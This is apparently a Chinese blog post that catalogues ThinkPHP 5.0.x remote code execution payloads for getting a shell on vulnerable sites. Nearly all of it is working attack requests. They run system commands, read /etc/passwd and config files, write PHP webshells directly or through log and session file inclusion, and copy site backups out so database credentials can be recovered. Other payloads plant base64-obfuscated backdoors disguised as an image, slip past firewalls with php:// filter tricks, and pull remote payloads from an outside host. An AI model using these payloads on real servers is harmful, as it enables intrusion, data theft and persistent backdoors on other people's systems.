thinkphp 5.0.1的坑

2021年04月18日

判断是否存在

http://xxx.com/public

/index.php?s=captcha

/?s=captcha

5.0.5 版本不是完整版没有
captcha路由时
/index.php/index
5.0.12<thinkphp<5.0.24 并开启 debug 时 payload 如下
?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
5.0.12<thinkphp<5.0.24 有 captcha 路由,无需开启 debug 时 payload 如下
?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.22 开启debug
打印phpinfo
/index.php/index
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111
读取日志
/index.php/index
_method=__construct&filter[]=readfile&server[REQUEST_METHOD]=../runtime/log/202012/04.log
写shell到日志文件中
/index.php/index
_method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?>
包含日志文件
/index.php/index
_method=__construct&filter[]=think\__include_file&server[REQUEST_METHOD]=../runtime/log/202012/04.log&cmd=phpinfo();
5.0.22 有路由时 无需debug
/index.php?s=captcha
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111&method=get
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
s=phpinfo()&_method=__construct&filter=assert
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[0]=phpinfo&get[1]=1
判断什么系统
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ipconfig
获取当前目录路径
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=chdir
在当前目录写入123.php
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval($_REQUEST[1])?>" >123.php

/public/123.php?1=phpinfo();;)

http:/xxxx.com/?s=index/index/index

s=ipconfig&_mehthod=__construct$method=&filter[]=system

仅有assert函数可用的情况下 如何写入  如何读取mysql

include函数,可以根据此函数查看一些文件及其配置

s=include("/etc/passwd")&_method=__construct&filter=assert

读取文件

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../application/.htaccess
s=include("../application/.htaccess")&_method=__construct&filter=assert

//ps:如果不加.. 请加上完整路径

在读取出来文件之后,由于一些关键目录受到了管理员的更改,所以为了读取出来文件夹目录,我们用到了var_dump函数

var_dump函数,可以查看该路径下的文件,文件夹

s=var_dump(scandir('../application/'))&_method=__construct&filter=assert

通过报错得知网站的目录是 /data/wwwroot/public/

意外发现在/data/目录下有网站备份文件

复制文件

s=copy("/data/ws.tar", "/data/wwwroot/public/ws.tar")&_method=__construct&filter=assert

直接通过web下载下来,本地寻找config文件,连接进mysql

一个针对5.0.1版本研究出来的写入命令

file_put_contents函数,可以直接写入文件

s=file_put_contents('/data/wwwroot/test.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4'))&_method=__construct&filter=assert

日志包含

写shell进日志
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>通过日志包含getshell
_method=__construct&method=get&filter=think\__include_file&get[]=/www/wwroot/runtime/log/202110/28.log   对日志进行包含
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();
日志文件较大copy新的一句话
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=echo copy("https://www.xxx.com/1.txt","D:/phpstudy_pro/WWW/tp5/ant.php");
日志不可写尝试在C:/windows/temp/ 下写 ant
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=file_put_contents(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70%5C%61%6E%74"),fopen("https://www.xxx.com/1.txt",'r'));
查看一下写入是否成功
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=$a="var_dump";$a(scandir(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70")));
再次包含 C:/windows/temp/ant
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=C:\Windows\Temp\ant&ant=phpinfo();

session包含getshell

写shell进session
POST /?s=captcha 
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1  
包含session getshell
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=/tmp/sess_kking&server[]=1
设置session
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=aaPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYWJjJ10pKTs/Pg&server[]=1
<?php eval(base64_decode($_POST['abc']));?>
使用伪协议包含过防火墙
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php


_method=__construct&method=get&filter[]=strrve&filter[]=think\__include_file&get[]=/tmp/sess_kking/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php&abc=cGhwaW5mbygpOw==

对payload加密处理
_method=__construct&method=get&filter=think\Session::set&get[]=<?PHP
$str="PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CgkJZXZhbCgkcGF5bG9hZCk7CiAgICAgICAgZWNobyBlbmNvZGUoQHJ1bigkZGF0YSksJGtleSk7CiAgICB9ZWxzZXsKICAgICAgICBpZiAoc3RyaXBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9";
file_put_contents('/www/wwwroot/icon.png',base64_decode("$str"));;


https://www.cnblogs.com/r00tuser/p/11410157.html

https://y4er.com/post/thinkphp5-rce/

https://forum.90sec.com/t/topic/704

https://www.cnblogs.com/whoami101/p/13364884.html

https://www.mrwu.red/web/3348.html

https://jokong201695.github.io/2020/05/12/ThinkPHP-%E6%BC%8F%E6%B4%9E%E5%88%97%E8%A1%A8/




分类:技术文章 | 标签: thinkphp渗透getshell | 查看:367
Linux服务器使用speedtest-cli测速Nginx设置开机自启

发表评论: